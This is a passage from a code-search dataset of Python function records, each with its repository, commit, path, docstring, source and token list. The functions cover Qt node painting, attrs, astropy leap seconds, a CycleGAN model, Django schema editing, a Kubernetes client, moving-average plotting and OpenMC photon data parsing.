painter.setBrush(utils._convertDataToColor(config['non_connectable_color']))
else:
_penValid = QtGui.QPen()
_penValid.setStyle(QtCore.Qt.SolidLine)
_penValid.setWidth(2)
_penValid.setColor(QtGui.QColor(255, 255, 255, 255))
painter.setPen(_penValid)
painter.setBrush(self.brush)
painter.drawEllipse(self.boundingRect())
|
[
"def",
"paint",
"(",
"self",
",",
"painter",
",",
"option",
",",
"widget",
")",
":",
"painter",
".",
"setBrush",
"(",
"self",
".",
"brush",
")",
"painter",
".",
"setPen",
"(",
"self",
".",
"pen",
")",
"nodzInst",
"=",
"self",
".",
"scene",
"(",
")",
".",
"views",
"(",
")",
"[",
"0",
"]",
"config",
"=",
"nodzInst",
".",
"config",
"if",
"nodzInst",
".",
"drawingConnection",
":",
"if",
"self",
".",
"parentItem",
"(",
")",
"==",
"nodzInst",
".",
"currentHoveredNode",
":",
"painter",
".",
"setBrush",
"(",
"utils",
".",
"_convertDataToColor",
"(",
"config",
"[",
"'non_connectable_color'",
"]",
")",
")",
"if",
"(",
"self",
".",
"slotType",
"==",
"nodzInst",
".",
"sourceSlot",
".",
"slotType",
"or",
"(",
"self",
".",
"slotType",
"!=",
"nodzInst",
".",
"sourceSlot",
".",
"slotType",
"and",
"self",
".",
"dataType",
"!=",
"nodzInst",
".",
"sourceSlot",
".",
"dataType",
")",
")",
":",
"painter",
".",
"setBrush",
"(",
"utils",
".",
"_convertDataToColor",
"(",
"config",
"[",
"'non_connectable_color'",
"]",
")",
")",
"else",
":",
"_penValid",
"=",
"QtGui",
".",
"QPen",
"(",
")",
"_penValid",
".",
"setStyle",
"(",
"QtCore",
".",
"Qt",
".",
"SolidLine",
")",
"_penValid",
".",
"setWidth",
"(",
"2",
")",
"_penValid",
".",
"setColor",
"(",
"QtGui",
".",
"QColor",
"(",
"255",
",",
"255",
",",
"255",
",",
"255",
")",
")",
"painter",
".",
"setPen",
"(",
"_penValid",
")",
"painter",
".",
"setBrush",
"(",
"self",
".",
"brush",
")",
"painter",
".",
"drawEllipse",
"(",
"self",
".",
"boundingRect",
"(",
")",
")"
] |
https://github.com/LeGoffLoic/Nodz/blob/0ee255c62883f7a374a9de6cbcf555e3352e5dec/nodz_main.py#L1672-L1695
|
||
wistbean/learn_python3_spider
|
73c873f4845f4385f097e5057407d03dd37a117b
|
stackoverflow/venv/lib/python3.6/site-packages/attr/_funcs.py
|
python
|
has
|
(cls)
|
return getattr(cls, "__attrs_attrs__", None) is not None
|
Check whether *cls* is a class with ``attrs`` attributes.
:param type cls: Class to introspect.
:raise TypeError: If *cls* is not a class.
:rtype: bool
|
Check whether *cls* is a class with ``attrs`` attributes.
|
[
"Check",
"whether",
"*",
"cls",
"*",
"is",
"a",
"class",
"with",
"attrs",
"attributes",
"."
] |
def has(cls):
"""
Check whether *cls* is a class with ``attrs`` attributes.
:param type cls: Class to introspect.
:raise TypeError: If *cls* is not a class.
:rtype: bool
"""
return getattr(cls, "__attrs_attrs__", None) is not None
|
[
"def",
"has",
"(",
"cls",
")",
":",
"return",
"getattr",
"(",
"cls",
",",
"\"__attrs_attrs__\"",
",",
"None",
")",
"is",
"not",
"None"
] |
https://github.com/wistbean/learn_python3_spider/blob/73c873f4845f4385f097e5057407d03dd37a117b/stackoverflow/venv/lib/python3.6/site-packages/attr/_funcs.py#L215-L224
|
|
holzschu/Carnets
|
44effb10ddfc6aa5c8b0687582a724ba82c6b547
|
Library/lib/python3.7/site-packages/astropy-4.0-py3.7-macosx-10.9-x86_64.egg/astropy/utils/iers/iers.py
|
python
|
LeapSeconds.from_erfa
|
(cls, built_in=False)
|
Create table from the leap-second list in ERFA.
Parameters
----------
built_in : bool
If `False` (default), retrieve the list currently used by ERFA,
which may have been updated. If `True`, retrieve the list shipped
with erfa.
|
Create table from the leap-second list in ERFA.
|
[
"Create",
"table",
"from",
"the",
"leap",
"-",
"second",
"list",
"in",
"ERFA",
"."
] |
def from_erfa(cls, built_in=False):
"""Create table from the leap-second list in ERFA.
Parameters
----------
built_in : bool
If `False` (default), retrieve the list currently used by ERFA,
which may have been updated. If `True`, retrieve the list shipped
with erfa.
"""
current = cls(erfa.leap_seconds.get())
current._expires = Time('{0.year:04d}-{0.month:02d}-{0.day:02d}'
.format(erfa.leap_seconds.expires),
scale='tai')
if not built_in:
return current
try:
erfa.leap_seconds.set(None) # reset to defaults
return cls.from_erfa(built_in=False)
finally:
erfa.leap_seconds.set(current)
|
[
"def",
"from_erfa",
"(",
"cls",
",",
"built_in",
"=",
"False",
")",
":",
"current",
"=",
"cls",
"(",
"erfa",
".",
"leap_seconds",
".",
"get",
"(",
")",
")",
"current",
".",
"_expires",
"=",
"Time",
"(",
"'{0.year:04d}-{0.month:02d}-{0.day:02d}'",
".",
"format",
"(",
"erfa",
".",
"leap_seconds",
".",
"expires",
")",
",",
"scale",
"=",
"'tai'",
")",
"if",
"not",
"built_in",
":",
"return",
"current",
"try",
":",
"erfa",
".",
"leap_seconds",
".",
"set",
"(",
"None",
")",
"# reset to defaults",
"return",
"cls",
".",
"from_erfa",
"(",
"built_in",
"=",
"False",
")",
"finally",
":",
"erfa",
".",
"leap_seconds",
".",
"set",
"(",
"current",
")"
] |
https://github.com/holzschu/Carnets/blob/44effb10ddfc6aa5c8b0687582a724ba82c6b547/Library/lib/python3.7/site-packages/astropy-4.0-py3.7-macosx-10.9-x86_64.egg/astropy/utils/iers/iers.py#L1100-L1121
|
||
sangwoomo/instagan
|
f9c1d9c9b7d2c21491317921f24a5200a02a823d
|
models/cycle_gan_model.py
|
python
|
CycleGANModel.initialize
|
(self, opt)
|
[] |
def initialize(self, opt):
BaseModel.initialize(self, opt)
# specify the training losses you want to print out. The program will call base_model.get_current_losses
self.loss_names = ['D_A', 'G_A', 'cycle_A', 'idt_A', 'D_B', 'G_B', 'cycle_B', 'idt_B']
# specify the images you want to save/display. The program will call base_model.get_current_visuals
visual_names_A = ['real_A', 'fake_B', 'rec_A']
visual_names_B = ['real_B', 'fake_A', 'rec_B']
if self.isTrain and self.opt.lambda_identity > 0.0:
visual_names_A.append('idt_A')
visual_names_B.append('idt_B')
self.visual_names = visual_names_A + visual_names_B
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks
if self.isTrain:
self.model_names = ['G_A', 'G_B', 'D_A', 'D_B']
else: # during test time, only load Gs
self.model_names = ['G_A', 'G_B']
# load/define networks
# The naming conversion is different from those used in the paper
# Code (paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)
self.netG_A = networks.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
self.netG_B = networks.define_G(opt.output_nc, opt.input_nc, opt.ngf, opt.netG, opt.norm,
not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain:
use_sigmoid = opt.no_lsgan
self.netD_A = networks.define_D(opt.output_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, use_sigmoid, opt.init_type, opt.init_gain, self.gpu_ids)
self.netD_B = networks.define_D(opt.input_nc, opt.ndf, opt.netD,
opt.n_layers_D, opt.norm, use_sigmoid, opt.init_type, opt.init_gain, self.gpu_ids)
if self.isTrain:
self.fake_A_pool = ImagePool(opt.pool_size)
self.fake_B_pool = ImagePool(opt.pool_size)
# define loss functions
self.criterionGAN = networks.GANLoss(use_lsgan=not opt.no_lsgan).to(self.device)
self.criterionCycle = torch.nn.L1Loss()
self.criterionIdt = torch.nn.L1Loss()
# initialize optimizers
self.optimizer_G = torch.optim.Adam(itertools.chain(self.netG_A.parameters(), self.netG_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizer_D = torch.optim.Adam(itertools.chain(self.netD_A.parameters(), self.netD_B.parameters()),
lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers = []
self.optimizers.append(self.optimizer_G)
self.optimizers.append(self.optimizer_D)
|
[
"def",
"initialize",
"(",
"self",
",",
"opt",
")",
":",
"BaseModel",
".",
"initialize",
"(",
"self",
",",
"opt",
")",
"# specify the training losses you want to print out. The program will call base_model.get_current_losses",
"self",
".",
"loss_names",
"=",
"[",
"'D_A'",
",",
"'G_A'",
",",
"'cycle_A'",
",",
"'idt_A'",
",",
"'D_B'",
",",
"'G_B'",
",",
"'cycle_B'",
",",
"'idt_B'",
"]",
"# specify the images you want to save/display. The program will call base_model.get_current_visuals",
"visual_names_A",
"=",
"[",
"'real_A'",
",",
"'fake_B'",
",",
"'rec_A'",
"]",
"visual_names_B",
"=",
"[",
"'real_B'",
",",
"'fake_A'",
",",
"'rec_B'",
"]",
"if",
"self",
".",
"isTrain",
"and",
"self",
".",
"opt",
".",
"lambda_identity",
">",
"0.0",
":",
"visual_names_A",
".",
"append",
"(",
"'idt_A'",
")",
"visual_names_B",
".",
"append",
"(",
"'idt_B'",
")",
"self",
".",
"visual_names",
"=",
"visual_names_A",
"+",
"visual_names_B",
"# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks",
"if",
"self",
".",
"isTrain",
":",
"self",
".",
"model_names",
"=",
"[",
"'G_A'",
",",
"'G_B'",
",",
"'D_A'",
",",
"'D_B'",
"]",
"else",
":",
"# during test time, only load Gs",
"self",
".",
"model_names",
"=",
"[",
"'G_A'",
",",
"'G_B'",
"]",
"# load/define networks",
"# The naming conversion is different from those used in the paper",
"# Code (paper): G_A (G), G_B (F), D_A (D_Y), D_B (D_X)",
"self",
".",
"netG_A",
"=",
"networks",
".",
"define_G",
"(",
"opt",
".",
"input_nc",
",",
"opt",
".",
"output_nc",
",",
"opt",
".",
"ngf",
",",
"opt",
".",
"netG",
",",
"opt",
".",
"norm",
",",
"not",
"opt",
".",
"no_dropout",
",",
"opt",
".",
"init_type",
",",
"opt",
".",
"init_gain",
",",
"self",
".",
"gpu_ids",
")",
"self",
".",
"netG_B",
"=",
"networks",
".",
"define_G",
"(",
"opt",
".",
"output_nc",
",",
"opt",
".",
"input_nc",
",",
"opt",
".",
"ngf",
",",
"opt",
".",
"netG",
",",
"opt",
".",
"norm",
",",
"not",
"opt",
".",
"no_dropout",
",",
"opt",
".",
"init_type",
",",
"opt",
".",
"init_gain",
",",
"self",
".",
"gpu_ids",
")",
"if",
"self",
".",
"isTrain",
":",
"use_sigmoid",
"=",
"opt",
".",
"no_lsgan",
"self",
".",
"netD_A",
"=",
"networks",
".",
"define_D",
"(",
"opt",
".",
"output_nc",
",",
"opt",
".",
"ndf",
",",
"opt",
".",
"netD",
",",
"opt",
".",
"n_layers_D",
",",
"opt",
".",
"norm",
",",
"use_sigmoid",
",",
"opt",
".",
"init_type",
",",
"opt",
".",
"init_gain",
",",
"self",
".",
"gpu_ids",
")",
"self",
".",
"netD_B",
"=",
"networks",
".",
"define_D",
"(",
"opt",
".",
"input_nc",
",",
"opt",
".",
"ndf",
",",
"opt",
".",
"netD",
",",
"opt",
".",
"n_layers_D",
",",
"opt",
".",
"norm",
",",
"use_sigmoid",
",",
"opt",
".",
"init_type",
",",
"opt",
".",
"init_gain",
",",
"self",
".",
"gpu_ids",
")",
"if",
"self",
".",
"isTrain",
":",
"self",
".",
"fake_A_pool",
"=",
"ImagePool",
"(",
"opt",
".",
"pool_size",
")",
"self",
".",
"fake_B_pool",
"=",
"ImagePool",
"(",
"opt",
".",
"pool_size",
")",
"# define loss functions",
"self",
".",
"criterionGAN",
"=",
"networks",
".",
"GANLoss",
"(",
"use_lsgan",
"=",
"not",
"opt",
".",
"no_lsgan",
")",
".",
"to",
"(",
"self",
".",
"device",
")",
"self",
".",
"criterionCycle",
"=",
"torch",
".",
"nn",
".",
"L1Loss",
"(",
")",
"self",
".",
"criterionIdt",
"=",
"torch",
".",
"nn",
".",
"L1Loss",
"(",
")",
"# initialize optimizers",
"self",
".",
"optimizer_G",
"=",
"torch",
".",
"optim",
".",
"Adam",
"(",
"itertools",
".",
"chain",
"(",
"self",
".",
"netG_A",
".",
"parameters",
"(",
")",
",",
"self",
".",
"netG_B",
".",
"parameters",
"(",
")",
")",
",",
"lr",
"=",
"opt",
".",
"lr",
",",
"betas",
"=",
"(",
"opt",
".",
"beta1",
",",
"0.999",
")",
")",
"self",
".",
"optimizer_D",
"=",
"torch",
".",
"optim",
".",
"Adam",
"(",
"itertools",
".",
"chain",
"(",
"self",
".",
"netD_A",
".",
"parameters",
"(",
")",
",",
"self",
".",
"netD_B",
".",
"parameters",
"(",
")",
")",
",",
"lr",
"=",
"opt",
".",
"lr",
",",
"betas",
"=",
"(",
"opt",
".",
"beta1",
",",
"0.999",
")",
")",
"self",
".",
"optimizers",
"=",
"[",
"]",
"self",
".",
"optimizers",
".",
"append",
"(",
"self",
".",
"optimizer_G",
")",
"self",
".",
"optimizers",
".",
"append",
"(",
"self",
".",
"optimizer_D",
")"
] |
https://github.com/sangwoomo/instagan/blob/f9c1d9c9b7d2c21491317921f24a5200a02a823d/models/cycle_gan_model.py#L23-L71
|
||||
JaniceWuo/MovieRecommend
|
4c86db64ca45598917d304f535413df3bc9fea65
|
movierecommend/venv1/Lib/site-packages/django/db/backends/base/schema.py
|
python
|
BaseDatabaseSchemaEditor.alter_index_together
|
(self, model, old_index_together, new_index_together)
|
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
|
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
|
[
"Deals",
"with",
"a",
"model",
"changing",
"its",
"index_together",
".",
"Note",
":",
"The",
"input",
"index_togethers",
"must",
"be",
"doubly",
"-",
"nested",
"not",
"the",
"single",
"-",
"nested",
"[",
"foo",
"bar",
"]",
"format",
"."
] |
def alter_index_together(self, model, old_index_together, new_index_together):
"""
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
"""
olds = set(tuple(fields) for fields in old_index_together)
news = set(tuple(fields) for fields in new_index_together)
# Deleted indexes
for fields in olds.difference(news):
self._delete_composed_index(model, fields, {'index': True}, self.sql_delete_index)
# Created indexes
for field_names in news.difference(olds):
fields = [model._meta.get_field(field) for field in field_names]
self.execute(self._create_index_sql(model, fields, suffix="_idx"))
|
[
"def",
"alter_index_together",
"(",
"self",
",",
"model",
",",
"old_index_together",
",",
"new_index_together",
")",
":",
"olds",
"=",
"set",
"(",
"tuple",
"(",
"fields",
")",
"for",
"fields",
"in",
"old_index_together",
")",
"news",
"=",
"set",
"(",
"tuple",
"(",
"fields",
")",
"for",
"fields",
"in",
"new_index_together",
")",
"# Deleted indexes",
"for",
"fields",
"in",
"olds",
".",
"difference",
"(",
"news",
")",
":",
"self",
".",
"_delete_composed_index",
"(",
"model",
",",
"fields",
",",
"{",
"'index'",
":",
"True",
"}",
",",
"self",
".",
"sql_delete_index",
")",
"# Created indexes",
"for",
"field_names",
"in",
"news",
".",
"difference",
"(",
"olds",
")",
":",
"fields",
"=",
"[",
"model",
".",
"_meta",
".",
"get_field",
"(",
"field",
")",
"for",
"field",
"in",
"field_names",
"]",
"self",
".",
"execute",
"(",
"self",
".",
"_create_index_sql",
"(",
"model",
",",
"fields",
",",
"suffix",
"=",
"\"_idx\"",
")",
")"
] |
https://github.com/JaniceWuo/MovieRecommend/blob/4c86db64ca45598917d304f535413df3bc9fea65/movierecommend/venv1/Lib/site-packages/django/db/backends/base/schema.py#L355-L369
|
||
tomplus/kubernetes_asyncio
|
f028cc793e3a2c519be6a52a49fb77ff0b014c9b
|
kubernetes_asyncio/client/models/v1_endpoint_port.py
|
python
|
V1EndpointPort.name
|
(self)
|
return self._name
|
Gets the name of this V1EndpointPort. # noqa: E501
The name of this port. This must match the 'name' field in the corresponding ServicePort. Must be a DNS_LABEL. Optional only if one port is defined. # noqa: E501
:return: The name of this V1EndpointPort. # noqa: E501
:rtype: str
|
Gets the name of this V1EndpointPort. # noqa: E501
|
[
"Gets",
"the",
"name",
"of",
"this",
"V1EndpointPort",
".",
"#",
"noqa",
":",
"E501"
] |
def name(self):
"""Gets the name of this V1EndpointPort. # noqa: E501
The name of this port. This must match the 'name' field in the corresponding ServicePort. Must be a DNS_LABEL. Optional only if one port is defined. # noqa: E501
:return: The name of this V1EndpointPort. # noqa: E501
:rtype: str
"""
return self._name
|
[
"def",
"name",
"(",
"self",
")",
":",
"return",
"self",
".",
"_name"
] |
https://github.com/tomplus/kubernetes_asyncio/blob/f028cc793e3a2c519be6a52a49fb77ff0b014c9b/kubernetes_asyncio/client/models/v1_endpoint_port.py#L93-L101
|
|
fmilthaler/FinQuant
|
38a2884663eea228540abd094b5c163f96c55aff
|
finquant/moving_average.py
|
python
|
compute_ma
|
(data, fun, spans, plot=True)
|
return ma
|
Computes a band of moving averages (sma or ema, depends on the input argument
`fun`) for a number of different time windows. If `plot` is `True`, it also
computes and sets markers for buy/sell signals based on crossovers of the Moving
Averages with the shortest/longest spans.
:Input:
:data: pandas.DataFrame with stock prices, only one column is expected.
:fun: function that computes a moving average, e.g. sma (simple) or
ema (exponential).
:spans: list of integers, time windows to compute the Moving Average on.
:plot: boolean (default: True), whether to plot the moving averages
and buy/sell signales based on crossovers of shortest and longest
moving average.
:Output:
:ma: pandas.DataFrame with moving averages of given data.
|
Computes a band of moving averages (sma or ema, depends on the input argument
`fun`) for a number of different time windows. If `plot` is `True`, it also
computes and sets markers for buy/sell signals based on crossovers of the Moving
Averages with the shortest/longest spans.
|
[
"Computes",
"a",
"band",
"of",
"moving",
"averages",
"(",
"sma",
"or",
"ema",
"depends",
"on",
"the",
"input",
"argument",
"fun",
")",
"for",
"a",
"number",
"of",
"different",
"time",
"windows",
".",
"If",
"plot",
"is",
"True",
"it",
"also",
"computes",
"and",
"sets",
"markers",
"for",
"buy",
"/",
"sell",
"signals",
"based",
"on",
"crossovers",
"of",
"the",
"Moving",
"Averages",
"with",
"the",
"shortest",
"/",
"longest",
"spans",
"."
] |
def compute_ma(data, fun, spans, plot=True):
"""Computes a band of moving averages (sma or ema, depends on the input argument
`fun`) for a number of different time windows. If `plot` is `True`, it also
computes and sets markers for buy/sell signals based on crossovers of the Moving
Averages with the shortest/longest spans.
:Input:
:data: pandas.DataFrame with stock prices, only one column is expected.
:fun: function that computes a moving average, e.g. sma (simple) or
ema (exponential).
:spans: list of integers, time windows to compute the Moving Average on.
:plot: boolean (default: True), whether to plot the moving averages
and buy/sell signales based on crossovers of shortest and longest
moving average.
:Output:
:ma: pandas.DataFrame with moving averages of given data.
"""
if not isinstance(data, pd.DataFrame):
raise ValueError("data must be of type pandas.DataFrame")
# compute moving averages
ma = data.copy(deep=True)
for span in spans:
ma[str(span) + "d"] = fun(data, span=span)
if plot:
fig = plt.figure()
ax = fig.add_subplot(111)
# plot moving averages
ma.plot(ax=ax)
# Create buy/sell signals of shortest and longest span
minspan = min(spans)
minlabel = str(minspan) + "d"
maxspan = max(spans)
maxlabel = str(maxspan) + "d"
signals = ma.copy(deep=True)
signals["diff"] = 0.0
signals["diff"][minspan:] = np.where(
ma[minlabel][minspan:] > ma[maxlabel][minspan:], 1.0, 0.0
)
# Generate trading orders
signals["signal"] = signals["diff"].diff()
# marker for buy signal
ax.plot(
signals.loc[signals["signal"] == 1.0].index.values,
signals[minlabel][signals["signal"] == 1.0].values,
marker="^",
markersize=10,
color="r",
label="buy signal",
)
# marker for sell signal
ax.plot(
signals.loc[signals["signal"] == -1.0].index.values,
signals[minlabel][signals["signal"] == -1.0].values,
marker="v",
markersize=10,
color="b",
label="sell signal",
)
# title
title = "Band of Moving Averages (" + str(fun.__name__) + ")"
plt.title(title)
# legend
plt.legend(ncol=2)
# axis labels
plt.xlabel(data.index.name)
plt.ylabel("Price")
return ma
|
[
"def",
"compute_ma",
"(",
"data",
",",
"fun",
",",
"spans",
",",
"plot",
"=",
"True",
")",
":",
"if",
"not",
"isinstance",
"(",
"data",
",",
"pd",
".",
"DataFrame",
")",
":",
"raise",
"ValueError",
"(",
"\"data must be of type pandas.DataFrame\"",
")",
"# compute moving averages",
"ma",
"=",
"data",
".",
"copy",
"(",
"deep",
"=",
"True",
")",
"for",
"span",
"in",
"spans",
":",
"ma",
"[",
"str",
"(",
"span",
")",
"+",
"\"d\"",
"]",
"=",
"fun",
"(",
"data",
",",
"span",
"=",
"span",
")",
"if",
"plot",
":",
"fig",
"=",
"plt",
".",
"figure",
"(",
")",
"ax",
"=",
"fig",
".",
"add_subplot",
"(",
"111",
")",
"# plot moving averages",
"ma",
".",
"plot",
"(",
"ax",
"=",
"ax",
")",
"# Create buy/sell signals of shortest and longest span",
"minspan",
"=",
"min",
"(",
"spans",
")",
"minlabel",
"=",
"str",
"(",
"minspan",
")",
"+",
"\"d\"",
"maxspan",
"=",
"max",
"(",
"spans",
")",
"maxlabel",
"=",
"str",
"(",
"maxspan",
")",
"+",
"\"d\"",
"signals",
"=",
"ma",
".",
"copy",
"(",
"deep",
"=",
"True",
")",
"signals",
"[",
"\"diff\"",
"]",
"=",
"0.0",
"signals",
"[",
"\"diff\"",
"]",
"[",
"minspan",
":",
"]",
"=",
"np",
".",
"where",
"(",
"ma",
"[",
"minlabel",
"]",
"[",
"minspan",
":",
"]",
">",
"ma",
"[",
"maxlabel",
"]",
"[",
"minspan",
":",
"]",
",",
"1.0",
",",
"0.0",
")",
"# Generate trading orders",
"signals",
"[",
"\"signal\"",
"]",
"=",
"signals",
"[",
"\"diff\"",
"]",
".",
"diff",
"(",
")",
"# marker for buy signal",
"ax",
".",
"plot",
"(",
"signals",
".",
"loc",
"[",
"signals",
"[",
"\"signal\"",
"]",
"==",
"1.0",
"]",
".",
"index",
".",
"values",
",",
"signals",
"[",
"minlabel",
"]",
"[",
"signals",
"[",
"\"signal\"",
"]",
"==",
"1.0",
"]",
".",
"values",
",",
"marker",
"=",
"\"^\"",
",",
"markersize",
"=",
"10",
",",
"color",
"=",
"\"r\"",
",",
"label",
"=",
"\"buy signal\"",
",",
")",
"# marker for sell signal",
"ax",
".",
"plot",
"(",
"signals",
".",
"loc",
"[",
"signals",
"[",
"\"signal\"",
"]",
"==",
"-",
"1.0",
"]",
".",
"index",
".",
"values",
",",
"signals",
"[",
"minlabel",
"]",
"[",
"signals",
"[",
"\"signal\"",
"]",
"==",
"-",
"1.0",
"]",
".",
"values",
",",
"marker",
"=",
"\"v\"",
",",
"markersize",
"=",
"10",
",",
"color",
"=",
"\"b\"",
",",
"label",
"=",
"\"sell signal\"",
",",
")",
"# title",
"title",
"=",
"\"Band of Moving Averages (\"",
"+",
"str",
"(",
"fun",
".",
"__name__",
")",
"+",
"\")\"",
"plt",
".",
"title",
"(",
"title",
")",
"# legend",
"plt",
".",
"legend",
"(",
"ncol",
"=",
"2",
")",
"# axis labels",
"plt",
".",
"xlabel",
"(",
"data",
".",
"index",
".",
"name",
")",
"plt",
".",
"ylabel",
"(",
"\"Price\"",
")",
"return",
"ma"
] |
https://github.com/fmilthaler/FinQuant/blob/38a2884663eea228540abd094b5c163f96c55aff/finquant/moving_average.py#L15-L82
|
|
openmc-dev/openmc
|
0cf7d9283786677e324bfbdd0984a54d1c86dacc
|
openmc/data/reaction.py
|
python
|
_get_photon_products_endf
|
(ev, rx)
|
return products
|
Generate photon products from an ENDF evaluation
Parameters
----------
ev : openmc.data.endf.Evaluation
ENDF evaluation to read from
rx : openmc.data.Reaction
Reaction that generates photons
Returns
-------
products : list of openmc.Products
Photons produced from reaction with given MT
|
Generate photon products from an ENDF evaluation
|
[
"Generate",
"photon",
"products",
"from",
"an",
"ENDF",
"evaluation"
] |
def _get_photon_products_endf(ev, rx):
"""Generate photon products from an ENDF evaluation
Parameters
----------
ev : openmc.data.endf.Evaluation
ENDF evaluation to read from
rx : openmc.data.Reaction
Reaction that generates photons
Returns
-------
products : list of openmc.Products
Photons produced from reaction with given MT
"""
products = []
if (12, rx.mt) in ev.section:
file_obj = StringIO(ev.section[12, rx.mt])
items = get_head_record(file_obj)
option = items[2]
if option == 1:
# Multiplicities given
n_discrete_photon = items[4]
if n_discrete_photon > 1:
items, total_yield = get_tab1_record(file_obj)
for k in range(n_discrete_photon):
photon = Product('photon')
# Get photon yield
items, photon.yield_ = get_tab1_record(file_obj)
# Get photon energy distribution
law = items[3]
dist = UncorrelatedAngleEnergy()
if law == 1:
# TODO: Get file 15 distribution
pass
elif law == 2:
energy = items[0]
primary_flag = items[2]
dist.energy = DiscretePhoton(primary_flag, energy,
ev.target['mass'])
photon.distribution.append(dist)
products.append(photon)
elif option == 2:
# Transition probability arrays given
ppyield = {}
ppyield['type'] = 'transition'
ppyield['transition'] = transition = {}
# Determine whether simple (LG=1) or complex (LG=2) transitions
lg = items[3]
# Get transition data
items, values = get_list_record(file_obj)
transition['energy_start'] = items[0]
transition['energies'] = np.array(values[::lg + 1])
transition['direct_probability'] = np.array(values[1::lg + 1])
if lg == 2:
# Complex case
transition['conditional_probability'] = np.array(
values[2::lg + 1])
elif (13, rx.mt) in ev.section:
file_obj = StringIO(ev.section[13, rx.mt])
# Determine option
items = get_head_record(file_obj)
n_discrete_photon = items[4]
if n_discrete_photon > 1:
items, total_xs = get_tab1_record(file_obj)
for k in range(n_discrete_photon):
photon = Product('photon')
items, xs = get_tab1_record(file_obj)
# Re-interpolate photon production cross section and neutron cross
# section to union energy grid
energy = np.union1d(xs.x, rx.xs['0K'].x)
photon_prod_xs = xs(energy)
neutron_xs = rx.xs['0K'](energy)
idx = np.where(neutron_xs > 0)
# Calculate yield as ratio
yield_ = np.zeros_like(energy)
yield_[idx] = photon_prod_xs[idx] / neutron_xs[idx]
photon.yield_ = Tabulated1D(energy, yield_)
# Get photon energy distribution
law = items[3]
dist = UncorrelatedAngleEnergy()
if law == 1:
# TODO: Get file 15 distribution
pass
elif law == 2:
energy = items[1]
primary_flag = items[2]
dist.energy = DiscretePhoton(primary_flag, energy,
ev.target['mass'])
photon.distribution.append(dist)
products.append(photon)
return products
|
[
"def",
"_get_photon_products_endf",
"(",
"ev",
",",
"rx",
")",
":",
"products",
"=",
"[",
"]",
"if",
"(",
"12",
",",
"rx",
".",
"mt",
")",
"in",
"ev",
".",
"section",
":",
"file_obj",
"=",
"StringIO",
"(",
"ev",
".",
"section",
"[",
"12",
",",
"rx",
".",
"mt",
"]",
")",
"items",
"=",
"get_head_record",
"(",
"file_obj",
")",
"option",
"=",
"items",
"[",
"2",
"]",
"if",
"option",
"==",
"1",
":",
"# Multiplicities given",
"n_discrete_photon",
"=",
"items",
"[",
"4",
"]",
"if",
"n_discrete_photon",
">",
"1",
":",
"items",
",",
"total_yield",
"=",
"get_tab1_record",
"(",
"file_obj",
")",
"for",
"k",
"in",
"range",
"(",
"n_discrete_photon",
")",
":",
"photon",
"=",
"Product",
"(",
"'photon'",
")",
"# Get photon yield",
"items",
",",
"photon",
".",
"yield_",
"=",
"get_tab1_record",
"(",
"file_obj",
")",
"# Get photon energy distribution",
"law",
"=",
"items",
"[",
"3",
"]",
"dist",
"=",
"UncorrelatedAngleEnergy",
"(",
")",
"if",
"law",
"==",
"1",
":",
"# TODO: Get file 15 distribution",
"pass",
"elif",
"law",
"==",
"2",
":",
"energy",
"=",
"items",
"[",
"0",
"]",
"primary_flag",
"=",
"items",
"[",
"2",
"]",
"dist",
".",
"energy",
"=",
"DiscretePhoton",
"(",
"primary_flag",
",",
"energy",
",",
"ev",
".",
"target",
"[",
"'mass'",
"]",
")",
"photon",
".",
"distribution",
".",
"append",
"(",
"dist",
")",
"products",
".",
"append",
"(",
"photon",
")",
"elif",
"option",
"==",
"2",
":",
"# Transition probability arrays given",
"ppyield",
"=",
"{",
"}",
"ppyield",
"[",
"'type'",
"]",
"=",
"'transition'",
"ppyield",
"[",
"'transition'",
"]",
"=",
"transition",
"=",
"{",
"}",
"# Determine whether simple (LG=1) or complex (LG=2) transitions",
"lg",
"=",
"items",
"[",
"3",
"]",
"# Get transition data",
"items",
",",
"values",
"=",
"get_list_record",
"(",
"file_obj",
")",
"transition",
"[",
"'energy_start'",
"]",
"=",
"items",
"[",
"0",
"]",
"transition",
"[",
"'energies'",
"]",
"=",
"np",
".",
"array",
"(",
"values",
"[",
":",
":",
"lg",
"+",
"1",
"]",
")",
"transition",
"[",
"'direct_probability'",
"]",
"=",
"np",
".",
"array",
"(",
"values",
"[",
"1",
":",
":",
"lg",
"+",
"1",
"]",
")",
"if",
"lg",
"==",
"2",
":",
"# Complex case",
"transition",
"[",
"'conditional_probability'",
"]",
"=",
"np",
".",
"array",
"(",
"values",
"[",
"2",
":",
":",
"lg",
"+",
"1",
"]",
")",
"elif",
"(",
"13",
",",
"rx",
".",
"mt",
")",
"in",
"ev",
".",
"section",
":",
"file_obj",
"=",
"StringIO",
"(",
"ev",
".",
"section",
"[",
"13",
",",
"rx",
".",
"mt",
"]",
")",
"# Determine option",
"items",
"=",
"get_head_record",
"(",
"file_obj",
")",
"n_discrete_photon",
"=",
"items",
"[",
"4",
"]",
"if",
"n_discrete_photon",
">",
"1",
":",
"items",
",",
"total_xs",
"=",
"get_tab1_record",
"(",
"file_obj",
")",
"for",
"k",
"in",
"range",
"(",
"n_discrete_photon",
")",
":",
"photon",
"=",
"Product",
"(",
"'photon'",
")",
"items",
",",
"xs",
"=",
"get_tab1_record",
"(",
"file_obj",
")",
"# Re-interpolate photon production cross section and neutron cross",
"# section to union energy grid",
"energy",
"=",
"np",
".",
"union1d",
"(",
"xs",
".",
"x",
",",
"rx",
".",
"xs",
"[",
"'0K'",
"]",
".",
"x",
")",
"photon_prod_xs",
"=",
"xs",
"(",
"energy",
")",
"neutron_xs",
"=",
"rx",
".",
"xs",
"[",
"'0K'",
"]",
"(",
"energy",
")",
"idx",
"=",
"np",
".",
"where",
"(",
"neutron_xs",
">",
"0",
")",
